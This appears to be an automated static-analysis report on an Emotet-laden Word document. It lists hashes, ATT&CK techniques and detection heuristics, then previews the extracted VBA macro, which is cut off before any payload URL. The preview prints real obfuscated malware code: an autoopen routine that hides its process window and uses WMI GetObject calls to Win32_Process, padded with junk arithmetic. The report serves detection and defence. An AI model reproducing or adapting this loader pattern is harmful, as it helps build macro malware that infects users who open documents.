Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b7c866e1206e59cc…

MALICIOUS

Office (OLE)

138.1 KB Created: 2019-05-21 11:29:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 0010687b41dbbb42241888d94883713d SHA-1: e4c6c0e62201bbe2cbde449e072cc4b5b2693a86 SHA-256: b7c866e1206e59ccc9331f6bc979987fc8d4039e986d05591ba8d1080a77bba2
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample contains a critical heuristic indicating an obfuscated auto-exec VBA loader, specifically an AutoOpen macro. ClamAV detection confirms this as Emotet, a known downloader. The VBA script is heavily obfuscated, but the presence of AutoOpen and GetObject calls strongly suggests it is designed to execute a second-stage payload, likely downloaded from a remote source.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5853 bytes
SHA-256: e5db2fe59875a3d9ba8615cb392736b9f6e1bc9b58bd6b45419bad62bdff0add
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "n43486_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V1309_, 0, 0, MSForms, TextBox"
Attribute VB_Control = "j0595625, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Y17505_"
Sub G25_3024()
   Dim k86_0814()
      ReDim k86_0814(22061)
      k86_0814(21923) = 537 + Int(X454589) + l_340_54 + Int(712) + m_8_94 + h166446 + 443 + P2264_
      k86_0814(21955) = 480 + Int(S72914) + b8662_5 + Int(774) + T_1466 + D_37953 + 317 + b36208_9
      k86_0814(21925) = 377 + Int(G99682) + B17774 + Int(444) + u1497737 + D45828 + 230 + a21484
      k86_0814(22033) = 343 + Int(i0064104) + b260__6 + Int(677) + W_54300 + i6304_04 + 613 + p050511
   Dim K_17084()
      ReDim K_17084(22061)
      K_17084(21923) = 806 + Int(p3_50_3_) + c73311 + Int(704) + o806129 + j961406 + 316 + d0_625
      K_17084(21955) = 53 + Int(A905946) + k_417749 + Int(457) + T99364 + J9216240 + 786 + k0677_06
      K_17084(21925) = 252 + Int(R_7533) + u597237 + Int(922) + N8658940 + O80461 + 393 + H_10265
      K_17084(22033) = 952 + Int(T1127_) + u49142_ + Int(360) + U229567 + t5_301 + 582 + N64404
End Sub
Sub _
autoopen( _
)
   Dim O_1_1949()
      ReDim O_1_1949(22061)
      O_1_1949(21923) = 80 + Int(j1_72869) + S318_469 + Int(708) + j2424596 + l98264 + 645 + K79_1_51
      O_1_1949(21955) = 984 + Int(Q542__) + p493197 + Int(455) + a10_012 + M20492 + 436 + Y727821
      O_1_1949(21925) = 568 + Int(j256166) + T74_19 + Int(401) + w_17_4_0 + P903793_ + 797 + q4045937
      O_1_1949(22033) = 113 + Int(o27541) + c32615 + Int(493) + I9979128 + c69332 + 981 + i2639818
k25542
   Dim C597787()
      ReDim C597787(87302)
      C597787(87146) = 509 + Int(w981938_) + R1863_39 + Int(415) + I520_68 + d051413 + 39 + C4762149
      C597787(87192) = 476 + Int(A22694) + o9_343 + Int(431) + F39338_ + u198830 + 328 + M778709_
      C597787(87156) = 72 + Int(N86883) + m5352575 + Int(108) + T1875167 + b8_2574 + 310 + w9505125
      C597787(87197) = 212 + Int(j947371) + K8_6383 + Int(296) + N2239770 + t14110_ + 595 + B33594
End Sub
Sub k25542()
   Dim b4980791()
      ReDim b4980791(87302)
      b4980791(87146) = 102 + Int(j95921) + c3298579 + Int(917) + V_67410 + X086_446 + 359 + B19825
      b4980791(87192) = 880 + Int(X655671) + D94685 + Int(657) + q511544 + K060301 + 245 + M_43344
      b4980791(87156) = 831 + Int(V516917) + E120304 + Int(715) + U555257 + r82651 + 951 + v1246005
      b4980791(87197) = 101 + Int(T_7246) + w0226588 + Int(946) + r4169251 + f836690 + 56 + u__909
Set d456__ = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Processstartup"))
   Dim n8040_53()
      ReDim n8040_53(87302)
      n8040_53(87146) = 460 + Int(a441098) + H_8515 + Int(276) + W0_520 + M14___82 + 392 + T754427
      n8040_53(87192) = 554 + Int(q03001) + F263_689 + Int(376) + z3760_8_ + P741752 + 5 + w6648_
      n8040_53(87156) = 170 + Int(h7947913) + z218197 + Int(218) + F694215 + q_9119 + 56 + l36307
      n8040_53(87197) = 77 + Int(r5628140) + V3755066 + Int(239) + u1346000 + M21740 + 692 + i3832120
d456__. _
ShowWindow = 375290 - 375290
   Dim p219465()
      ReDim p219465(87302)
      p219465(87146) = 656 + Int(S79454) + G5029626 + Int(769) + I3504_4 + D258_829 + 333 + q_266254
      p219465(87192) = 826 + Int(K33_9_) + S209711 + Int(156) + R52807 + v526_7 + 833 + L5102209
      p219465(87156) = 773 + Int(c66_33) + B6488914 + Int(350) + N_8198 + J44_18 + 100 + v249220
      p219465(87197) = 404 + Int(R2206078) + U84_0458 + Int(573) + i3743652 + j_003169 + 45 + v8130409
Set k085719 = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Process"))
   Dim u6818672()
      ReDim u6818672(87302)
      u6818672(87146) = 673 + Int(z91505) + d22406 + Int(350) + f_40472 + d__496 + 402 + M1_987
      u6818672(87192) = 350 + Int(W45113) + k_573_67 + Int(808) + M47_422 + s497638 + 499 + r850062
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.